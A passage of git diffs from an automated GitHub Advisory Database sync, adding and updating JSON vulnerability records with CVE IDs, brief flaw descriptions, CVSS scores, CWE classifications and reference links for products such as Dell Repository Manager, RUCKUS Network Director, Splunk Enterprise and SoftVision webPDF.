"2026-02-23T15:31:15Z", + "aliases": [ + "CVE-2026-21420" + ], + "details": "Dell Repository Manager (DRM), versions prior to 3.4.8, contains an Uncontrolled Search Path Element vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to arbitrary code execution and escalation of privileges.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21420" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000430183/dsa-2026-059-security-update-for-dell-repository-manager-vulnerability" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-427" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T14:16:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cqp7-wf4c-3xgc/GHSA-cqp7-wf4c-3xgc.json b/advisories/unreviewed/2026/02/GHSA-cqp7-wf4c-3xgc/GHSA-cqp7-wf4c-3xgc.json index 775d3c79f3a9e..a63eeb989cf73 100644 --- a/advisories/unreviewed/2026/02/GHSA-cqp7-wf4c-3xgc/GHSA-cqp7-wf4c-3xgc.json +++ b/advisories/unreviewed/2026/02/GHSA-cqp7-wf4c-3xgc/GHSA-cqp7-wf4c-3xgc.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-79" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-g666-g65w-p8mh/GHSA-g666-g65w-p8mh.json b/advisories/unreviewed/2026/02/GHSA-g666-g65w-p8mh/GHSA-g666-g65w-p8mh.json index f0d32674372c0..f09a6f34cfec7 100644 --- a/advisories/unreviewed/2026/02/GHSA-g666-g65w-p8mh/GHSA-g666-g65w-p8mh.json +++ b/advisories/unreviewed/2026/02/GHSA-g666-g65w-p8mh/GHSA-g666-g65w-p8mh.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-g666-g65w-p8mh", - "modified": "2026-02-12T09:30:59Z", + "modified": "2026-02-23T15:31:14Z", "published": "2026-02-12T09:30:59Z", "aliases": [ "CVE-2025-15577" ], "details": "An unauthenticated attacker can exploit this vulnerability by manipulating URL to achieve arbitrary file read access.This issue affects Valmet DNA Web Tools: C2022 and older.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:Y/R:X/V:D/RE:M/U:Green" diff --git a/advisories/unreviewed/2026/02/GHSA-jxwm-5mrm-6h8j/GHSA-jxwm-5mrm-6h8j.json b/advisories/unreviewed/2026/02/GHSA-jxwm-5mrm-6h8j/GHSA-jxwm-5mrm-6h8j.json index 536ae5480801b..891572a259579 100644 --- a/advisories/unreviewed/2026/02/GHSA-jxwm-5mrm-6h8j/GHSA-jxwm-5mrm-6h8j.json +++ b/advisories/unreviewed/2026/02/GHSA-jxwm-5mrm-6h8j/GHSA-jxwm-5mrm-6h8j.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-jxwm-5mrm-6h8j", - "modified": "2026-02-19T21:30:47Z", + "modified": "2026-02-23T15:31:14Z", "published": "2026-02-19T21:30:47Z", "aliases": [ "CVE-2025-67304" ], "details": "In Ruckus Network Director (RND) < 4.5.0.54, the OVA appliance contains hardcoded credentials for the ruckus PostgreSQL database user. In the default configuration, the PostgreSQL service is accessible over the network on TCP port 5432. An attacker can use the hardcoded credentials to authenticate remotely, gaining superuser access to the database. This allows creation of administrative users for the web interface, extraction of password hashes, and execution of arbitrary OS commands.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-798" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T20:25:24Z" diff --git a/advisories/unreviewed/2026/02/GHSA-mc6c-v4m2-858f/GHSA-mc6c-v4m2-858f.json b/advisories/unreviewed/2026/02/GHSA-mc6c-v4m2-858f/GHSA-mc6c-v4m2-858f.json index 12970f95c57c7..0acb8892b1f42 100644 --- a/advisories/unreviewed/2026/02/GHSA-mc6c-v4m2-858f/GHSA-mc6c-v4m2-858f.json +++ b/advisories/unreviewed/2026/02/GHSA-mc6c-v4m2-858f/GHSA-mc6c-v4m2-858f.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-mc6c-v4m2-858f", - "modified": "2026-02-19T21:30:48Z", + "modified": "2026-02-23T15:31:14Z", "published": "2026-02-19T21:30:48Z", "aliases": [ "CVE-2025-67305" ], "details": "In RUCKUS Network Director (RND) < 4.5.0.56, the OVA appliance contains hardcoded SSH keys for the postgres user. These keys are identical across all deployments, allowing an attacker with network access to authenticate via SSH without a password. Once authenticated, the attacker can access the PostgreSQL database with superuser privileges, create administrative users for the web interface, and potentially escalate privileges further.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-321" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T21:18:28Z" diff --git a/advisories/unreviewed/2026/02/GHSA-rq7m-qrq2-mrg5/GHSA-rq7m-qrq2-mrg5.json b/advisories/unreviewed/2026/02/GHSA-rq7m-qrq2-mrg5/GHSA-rq7m-qrq2-mrg5.json new file mode 100644 index 0000000000000..0dbe618ff64df --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rq7m-qrq2-mrg5/GHSA-rq7m-qrq2-mrg5.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rq7m-qrq2-mrg5", + "modified": "2026-02-23T15:31:14Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-20142" + ], + "details": "In Splunk Enterprise versions below 10.2.0, 10.0.2, 9.4.7, 9.3.9, and 9.2.11, a user of a Splunk Search Head Cluster (SHC) deployment who holds a role with access to the Splunk `_internal` index could view the RSA `accessKey` value from the [Authentication.conf ](https://help.splunk.com/en/splunk-enterprise/administer/admin-manual/10.2/configuration-file-reference/10.2.0-configuration-file-reference/authentication.conf)file, in plain text.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20142" + }, + { + "type": "WEB", + "url": "https://advisory.splunk.com/advisories/SVD-2026-0207" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-532" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-ww95-r66q-v2hh/GHSA-ww95-r66q-v2hh.json b/advisories/unreviewed/2026/02/GHSA-ww95-r66q-v2hh/GHSA-ww95-r66q-v2hh.json index e6e0fe1cba379..de4efc4d764a6 100644 --- a/advisories/unreviewed/2026/02/GHSA-ww95-r66q-v2hh/GHSA-ww95-r66q-v2hh.json +++ b/advisories/unreviewed/2026/02/GHSA-ww95-r66q-v2hh/GHSA-ww95-r66q-v2hh.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-ww95-r66q-v2hh", - "modified": "2026-02-19T15:30:35Z", + "modified": "2026-02-23T15:31:14Z", "published": "2026-02-19T15:30:35Z", "aliases": [ "CVE-2025-55853" ], "details": "SoftVision webPDF before 10.0.2 is vulnerable to Server-Side Request Forgery (SSRF). The PDF converter function does not check if internal or external resources are requested in the uploaded files and allows for protocols such as http:// and file:///. This allows an attacker to upload an XML or HTML file in the application, which when rendered to a PDF allows for internal port scanning and Local File Inclusion (LFI).", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-918" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T15:16:11Z" From 153075bd07f0be14e7e2dcbe7e84d26bd33a9e28 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 18:33:02 +0000 Subject: [PATCH 54/77] Advisory Database Sync --- .../GHSA-9vr7-rp6q-4v56.json | 10 +++- .../GHSA-r5q9-m2x7-ffq7.json | 10 +++- .../GHSA-386j-h4xj-j5ph.json | 2 +- .../GHSA-4v5p-6cwv-27q5.json | 2 +- .../GHSA-5rqh-7vr7-2xv6.json | 2 +- .../GHSA-5wr3-pfv7-cqv6.json | 2 +- .../GHSA-79w3-7qr6-6x7v.json | 2 +- .../GHSA-f475-9c64-jrvp.json | 2 +- .../GHSA-fh2p-293q-jmxp.json | 2 +- .../GHSA-j2mp-wxpv-6jr8.json | 2 +- .../GHSA-m2vp-mjvj-xgg7.json | 2 +- .../GHSA-pmhj-hpgr-f94j.json | 2 +- .../GHSA-q4pw-cw84-2mfm.json | 2 +- .../GHSA-w5jh-vr73-453v.json | 2 +- .../GHSA-5mc7-p6pj-r3f5.json | 10 +++- .../GHSA-38fx-8cr9-9925.json | 11 +++- .../GHSA-4jh8-xj74-jhxx.json | 44 +++++++++++++++ .../GHSA-4w36-hgqj-cjp2.json | 56 +++++++++++++++++++ .../GHSA-62pw-p3ph-rgh9.json | 44 +++++++++++++++ .../GHSA-663h-2vr3-ghrj.json | 37 ++++++++++++ .../GHSA-6pjc-995p-mh58.json | 40 +++++++++++++ .../GHSA-744p-mq95-2m92.json | 29 ++++++++++ .../GHSA-9hjg-4h75-mvc5.json | 44 +++++++++++++++ .../GHSA-c3f3-cc42-xr9v.json | 11 +++- .../GHSA-gfw7-2v73-69wg.json | 11 +++- .../GHSA-h2mx-ppvp-v2rq.json | 37 ++++++++++++ .../GHSA-jqx8-f6x9-hm34.json | 44 +++++++++++++++ .../GHSA-m575-4pr9-x5xr.json | 44 +++++++++++++++ .../GHSA-mv94-7vf6-c5q6.json | 56 +++++++++++++++++++ .../GHSA-p76h-f4cx-3273.json | 36 ++++++++++++ .../GHSA-pj4q-4jcg-hp2c.json | 36 ++++++++++++ .../GHSA-q4hc-vp2m-fr47.json | 40 +++++++++++++ .../GHSA-q6w4-grhv-wcp8.json | 44 +++++++++++++++ .../GHSA-vm54-j482-hx4h.json | 44 +++++++++++++++ .../GHSA-xfxx-38qx-mrf4.json | 11 +++- 35 files changed, 744 insertions(+), 29 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-4jh8-xj74-jhxx/GHSA-4jh8-xj74-jhxx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4w36-hgqj-cjp2/GHSA-4w36-hgqj-cjp2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-62pw-p3ph-rgh9/GHSA-62pw-p3ph-rgh9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-663h-2vr3-ghrj/GHSA-663h-2vr3-ghrj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6pjc-995p-mh58/GHSA-6pjc-995p-mh58.json create mode 100644 advisories/unreviewed/2026/02/GHSA-744p-mq95-2m92/GHSA-744p-mq95-2m92.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9hjg-4h75-mvc5/GHSA-9hjg-4h75-mvc5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h2mx-ppvp-v2rq/GHSA-h2mx-ppvp-v2rq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jqx8-f6x9-hm34/GHSA-jqx8-f6x9-hm34.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m575-4pr9-x5xr/GHSA-m575-4pr9-x5xr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mv94-7vf6-c5q6/GHSA-mv94-7vf6-c5q6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p76h-f4cx-3273/GHSA-p76h-f4cx-3273.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pj4q-4jcg-hp2c/GHSA-pj4q-4jcg-hp2c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q4hc-vp2m-fr47/GHSA-q4hc-vp2m-fr47.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q6w4-grhv-wcp8/GHSA-q6w4-grhv-wcp8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vm54-j482-hx4h/GHSA-vm54-j482-hx4h.json diff --git a/advisories/unreviewed/2022/01/GHSA-9vr7-rp6q-4v56/GHSA-9vr7-rp6q-4v56.json b/advisories/unreviewed/2022/01/GHSA-9vr7-rp6q-4v56/GHSA-9vr7-rp6q-4v56.json index 195ea2ddf6c72..37015299f14a6 100644 --- a/advisories/unreviewed/2022/01/GHSA-9vr7-rp6q-4v56/GHSA-9vr7-rp6q-4v56.json +++ b/advisories/unreviewed/2022/01/GHSA-9vr7-rp6q-4v56/GHSA-9vr7-rp6q-4v56.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-9vr7-rp6q-4v56", - "modified": "2022-02-05T00:01:29Z", + "modified": "2026-02-23T18:31:56Z", "published": "2022-01-25T00:00:45Z", "aliases": [ "CVE-2021-36342" ], "details": "Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -21,6 +26,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-119", "CWE-20" ], "severity": "HIGH", diff --git a/advisories/unreviewed/2022/01/GHSA-r5q9-m2x7-ffq7/GHSA-r5q9-m2x7-ffq7.json b/advisories/unreviewed/2022/01/GHSA-r5q9-m2x7-ffq7/GHSA-r5q9-m2x7-ffq7.json index e77ed777d9267..598d2f819ee33 100644 --- a/advisories/unreviewed/2022/01/GHSA-r5q9-m2x7-ffq7/GHSA-r5q9-m2x7-ffq7.json +++ b/advisories/unreviewed/2022/01/GHSA-r5q9-m2x7-ffq7/GHSA-r5q9-m2x7-ffq7.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-r5q9-m2x7-ffq7", - "modified": "2022-02-05T00:01:22Z", + "modified": "2026-02-23T18:31:56Z", "published": "2022-01-25T00:00:46Z", "aliases": [ "CVE-2021-36343" ], "details": "Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -21,6 +26,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-119", "CWE-20" ], "severity": "HIGH", diff --git a/advisories/unreviewed/2022/05/GHSA-386j-h4xj-j5ph/GHSA-386j-h4xj-j5ph.json b/advisories/unreviewed/2022/05/GHSA-386j-h4xj-j5ph/GHSA-386j-h4xj-j5ph.json index d1aeb0d42f1af..b1644cfdbc3ba 100644 --- a/advisories/unreviewed/2022/05/GHSA-386j-h4xj-j5ph/GHSA-386j-h4xj-j5ph.json +++ b/advisories/unreviewed/2022/05/GHSA-386j-h4xj-j5ph/GHSA-386j-h4xj-j5ph.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-386j-h4xj-j5ph", - "modified": "2023-12-31T21:30:23Z", + "modified": "2026-02-23T18:31:49Z", "published": "2022-05-24T17:31:00Z", "aliases": [ "CVE-2020-16940" diff --git a/advisories/unreviewed/2022/05/GHSA-4v5p-6cwv-27q5/GHSA-4v5p-6cwv-27q5.json b/advisories/unreviewed/2022/05/GHSA-4v5p-6cwv-27q5/GHSA-4v5p-6cwv-27q5.json index adc93158ae170..bf312f19c31b8 100644 --- a/advisories/unreviewed/2022/05/GHSA-4v5p-6cwv-27q5/GHSA-4v5p-6cwv-27q5.json +++ b/advisories/unreviewed/2022/05/GHSA-4v5p-6cwv-27q5/GHSA-4v5p-6cwv-27q5.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4v5p-6cwv-27q5", - "modified": "2023-12-31T21:30:23Z", + "modified": "2026-02-23T18:31:50Z", "published": "2022-05-24T17:31:01Z", "aliases": [ "CVE-2020-16968" diff --git a/advisories/unreviewed/2022/05/GHSA-5rqh-7vr7-2xv6/GHSA-5rqh-7vr7-2xv6.json b/advisories/unreviewed/2022/05/GHSA-5rqh-7vr7-2xv6/GHSA-5rqh-7vr7-2xv6.json index 8a80de278faea..1556c50f0f7a0 100644 --- a/advisories/unreviewed/2022/05/GHSA-5rqh-7vr7-2xv6/GHSA-5rqh-7vr7-2xv6.json +++ b/advisories/unreviewed/2022/05/GHSA-5rqh-7vr7-2xv6/GHSA-5rqh-7vr7-2xv6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5rqh-7vr7-2xv6", - "modified": "2023-12-31T21:30:23Z", + "modified": "2026-02-23T18:31:49Z", "published": "2022-05-24T17:30:59Z", "aliases": [ "CVE-2020-16932" diff --git a/advisories/unreviewed/2022/05/GHSA-5wr3-pfv7-cqv6/GHSA-5wr3-pfv7-cqv6.json b/advisories/unreviewed/2022/05/GHSA-5wr3-pfv7-cqv6/GHSA-5wr3-pfv7-cqv6.json index 6ba085e4da0bf..b2c9540b211d8 100644 --- a/advisories/unreviewed/2022/05/GHSA-5wr3-pfv7-cqv6/GHSA-5wr3-pfv7-cqv6.json +++ b/advisories/unreviewed/2022/05/GHSA-5wr3-pfv7-cqv6/GHSA-5wr3-pfv7-cqv6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5wr3-pfv7-cqv6", - "modified": "2022-11-21T18:30:37Z", + "modified": "2026-02-23T18:31:50Z", "published": "2022-05-24T17:31:00Z", "aliases": [ "CVE-2020-16947" diff --git a/advisories/unreviewed/2022/05/GHSA-79w3-7qr6-6x7v/GHSA-79w3-7qr6-6x7v.json b/advisories/unreviewed/2022/05/GHSA-79w3-7qr6-6x7v/GHSA-79w3-7qr6-6x7v.json index cdbccc137282c..407ac4195c31c 100644 --- a/advisories/unreviewed/2022/05/GHSA-79w3-7qr6-6x7v/GHSA-79w3-7qr6-6x7v.json +++ b/advisories/unreviewed/2022/05/GHSA-79w3-7qr6-6x7v/GHSA-79w3-7qr6-6x7v.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-79w3-7qr6-6x7v", - "modified": "2023-12-31T21:30:23Z", + "modified": "2026-02-23T18:31:48Z", "published": "2022-05-24T17:30:57Z", "aliases": [ "CVE-2020-16929" diff --git a/advisories/unreviewed/2022/05/GHSA-f475-9c64-jrvp/GHSA-f475-9c64-jrvp.json b/advisories/unreviewed/2022/05/GHSA-f475-9c64-jrvp/GHSA-f475-9c64-jrvp.json index 0460776384b74..874794a18bca2 100644 --- a/advisories/unreviewed/2022/05/GHSA-f475-9c64-jrvp/GHSA-f475-9c64-jrvp.json +++ b/advisories/unreviewed/2022/05/GHSA-f475-9c64-jrvp/GHSA-f475-9c64-jrvp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-f475-9c64-jrvp", - "modified": "2023-12-31T21:30:23Z", + "modified": "2026-02-23T18:31:49Z", "published": "2022-05-24T17:30:58Z", "aliases": [ "CVE-2020-16930" diff --git a/advisories/unreviewed/2022/05/GHSA-fh2p-293q-jmxp/GHSA-fh2p-293q-jmxp.json b/advisories/unreviewed/2022/05/GHSA-fh2p-293q-jmxp/GHSA-fh2p-293q-jmxp.json index 0c64e2e0bd20f..f48ac682f63c7 100644 --- a/advisories/unreviewed/2022/05/GHSA-fh2p-293q-jmxp/GHSA-fh2p-293q-jmxp.json +++ b/advisories/unreviewed/2022/05/GHSA-fh2p-293q-jmxp/GHSA-fh2p-293q-jmxp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-fh2p-293q-jmxp", - "modified": "2023-12-31T21:30:23Z", + "modified": "2026-02-23T18:31:49Z", "published": "2022-05-24T17:30:59Z", "aliases": [ "CVE-2020-16939" diff --git a/advisories/unreviewed/2022/05/GHSA-j2mp-wxpv-6jr8/GHSA-j2mp-wxpv-6jr8.json b/advisories/unreviewed/2022/05/GHSA-j2mp-wxpv-6jr8/GHSA-j2mp-wxpv-6jr8.json index 096f95110de9f..4854e6c8daff3 100644 --- a/advisories/unreviewed/2022/05/GHSA-j2mp-wxpv-6jr8/GHSA-j2mp-wxpv-6jr8.json +++ b/advisories/unreviewed/2022/05/GHSA-j2mp-wxpv-6jr8/GHSA-j2mp-wxpv-6jr8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-j2mp-wxpv-6jr8", - "modified": "2023-12-31T21:30:22Z", + "modified": "2026-02-23T18:31:48Z", "published": "2022-05-24T17:30:56Z", "aliases": [ "CVE-2020-16915" diff --git a/advisories/unreviewed/2022/05/GHSA-m2vp-mjvj-xgg7/GHSA-m2vp-mjvj-xgg7.json b/advisories/unreviewed/2022/05/GHSA-m2vp-mjvj-xgg7/GHSA-m2vp-mjvj-xgg7.json index b070d005bf515..876a7e0822ba4 100644 --- a/advisories/unreviewed/2022/05/GHSA-m2vp-mjvj-xgg7/GHSA-m2vp-mjvj-xgg7.json +++ b/advisories/unreviewed/2022/05/GHSA-m2vp-mjvj-xgg7/GHSA-m2vp-mjvj-xgg7.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m2vp-mjvj-xgg7", - "modified": "2024-01-01T00:30:39Z", + "modified": "2026-02-23T18:31:33Z", "published": "2022-05-24T17:27:56Z", "aliases": [ "CVE-2020-0997" diff --git a/advisories/unreviewed/2022/05/GHSA-pmhj-hpgr-f94j/GHSA-pmhj-hpgr-f94j.json b/advisories/unreviewed/2022/05/GHSA-pmhj-hpgr-f94j/GHSA-pmhj-hpgr-f94j.json index 396903baf63f0..2b5874840c4e7 100644 --- a/advisories/unreviewed/2022/05/GHSA-pmhj-hpgr-f94j/GHSA-pmhj-hpgr-f94j.json +++ b/advisories/unreviewed/2022/05/GHSA-pmhj-hpgr-f94j/GHSA-pmhj-hpgr-f94j.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-pmhj-hpgr-f94j", - "modified": "2023-12-31T21:30:24Z", + "modified": "2026-02-23T18:31:51Z", "published": "2022-05-24T17:30:49Z", "aliases": [ "CVE-2020-1167" diff --git a/advisories/unreviewed/2022/05/GHSA-q4pw-cw84-2mfm/GHSA-q4pw-cw84-2mfm.json b/advisories/unreviewed/2022/05/GHSA-q4pw-cw84-2mfm/GHSA-q4pw-cw84-2mfm.json index d6e39fe2fb2a9..e6751526b556a 100644 --- a/advisories/unreviewed/2022/05/GHSA-q4pw-cw84-2mfm/GHSA-q4pw-cw84-2mfm.json +++ b/advisories/unreviewed/2022/05/GHSA-q4pw-cw84-2mfm/GHSA-q4pw-cw84-2mfm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q4pw-cw84-2mfm", - "modified": "2022-12-07T00:30:24Z", + "modified": "2026-02-23T18:31:40Z", "published": "2022-05-24T17:28:01Z", "aliases": [ "CVE-2020-1319" diff --git a/advisories/unreviewed/2022/05/GHSA-w5jh-vr73-453v/GHSA-w5jh-vr73-453v.json b/advisories/unreviewed/2022/05/GHSA-w5jh-vr73-453v/GHSA-w5jh-vr73-453v.json index 8bb61caea7969..22639418da768 100644 --- a/advisories/unreviewed/2022/05/GHSA-w5jh-vr73-453v/GHSA-w5jh-vr73-453v.json +++ b/advisories/unreviewed/2022/05/GHSA-w5jh-vr73-453v/GHSA-w5jh-vr73-453v.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w5jh-vr73-453v", - "modified": "2023-12-31T21:30:23Z", + "modified": "2026-02-23T18:31:49Z", "published": "2022-05-24T17:30:58Z", "aliases": [ "CVE-2020-16931" diff --git a/advisories/unreviewed/2026/01/GHSA-5mc7-p6pj-r3f5/GHSA-5mc7-p6pj-r3f5.json b/advisories/unreviewed/2026/01/GHSA-5mc7-p6pj-r3f5/GHSA-5mc7-p6pj-r3f5.json index a46c72ac4d3be..8a7cfb791aa93 100644 --- a/advisories/unreviewed/2026/01/GHSA-5mc7-p6pj-r3f5/GHSA-5mc7-p6pj-r3f5.json +++ b/advisories/unreviewed/2026/01/GHSA-5mc7-p6pj-r3f5/GHSA-5mc7-p6pj-r3f5.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5mc7-p6pj-r3f5", - "modified": "2026-02-13T18:31:23Z", + "modified": "2026-02-23T18:31:56Z", "published": "2026-01-21T00:31:42Z", "aliases": [ "CVE-2026-0865" @@ -47,6 +47,14 @@ "type": "WEB", "url": "https://github.com/python/cpython/commit/66da7bf6fe7b81e3ecc9c0a25bd47d4616c8d1a6" }, + { + "type": "WEB", + "url": "https://github.com/python/cpython/commit/83ecd18779f286d872f68bfce175651e407d9fff" + }, + { + "type": "WEB", + "url": "https://github.com/python/cpython/commit/bfba660085767f8c2d582134e9d511a85eda04cf" + }, { "type": "WEB", "url": "https://github.com/python/cpython/commit/e4846a93ac07a8ae9aa18203af0dd13d6e7a6995" diff --git a/advisories/unreviewed/2026/02/GHSA-38fx-8cr9-9925/GHSA-38fx-8cr9-9925.json b/advisories/unreviewed/2026/02/GHSA-38fx-8cr9-9925/GHSA-38fx-8cr9-9925.json index cc3933f36feaf..aca210d92d817 100644 --- a/advisories/unreviewed/2026/02/GHSA-38fx-8cr9-9925/GHSA-38fx-8cr9-9925.json +++ b/advisories/unreviewed/2026/02/GHSA-38fx-8cr9-9925/GHSA-38fx-8cr9-9925.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-38fx-8cr9-9925", - "modified": "2026-02-20T18:31:39Z", + "modified": "2026-02-23T18:31:56Z", "published": "2026-02-20T18:31:39Z", "aliases": [ "CVE-2026-27072" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PixelYourSite PixelYourSite – Your smart PIXEL (TAG) Manager pixelyoursite allows Stored XSS.This issue affects PixelYourSite – Your smart PIXEL (TAG) Manager: from n/a through <= 11.2.0.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:45Z" diff --git a/advisories/unreviewed/2026/02/GHSA-4jh8-xj74-jhxx/GHSA-4jh8-xj74-jhxx.json b/advisories/unreviewed/2026/02/GHSA-4jh8-xj74-jhxx/GHSA-4jh8-xj74-jhxx.json new file mode 100644 index 0000000000000..a6a10b698ea63 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4jh8-xj74-jhxx/GHSA-4jh8-xj74-jhxx.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4jh8-xj74-jhxx", + "modified": "2026-02-23T18:32:02Z", + "published": "2026-02-23T18:32:02Z", + "aliases": [ + "CVE-2025-70043" + ], + "details": "An issue pertaining to CWE-295: Improper Certificate Validation was discovered in Ayms node-To master. The application disables TLS/SSL certificate validation by setting 'rejectUnauthorized': false in TLS socket options", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70043" + }, + { + "type": "WEB", + "url": "https://gist.github.com/zcxlighthouse/33cc4342dfe650664548b4531d16b655" + }, + { + "type": "WEB", + "url": "https://github.com/Ayms" + }, + { + "type": "WEB", + "url": "https://github.com/Ayms/node-To" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T16:29:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4w36-hgqj-cjp2/GHSA-4w36-hgqj-cjp2.json b/advisories/unreviewed/2026/02/GHSA-4w36-hgqj-cjp2/GHSA-4w36-hgqj-cjp2.json new file mode 100644 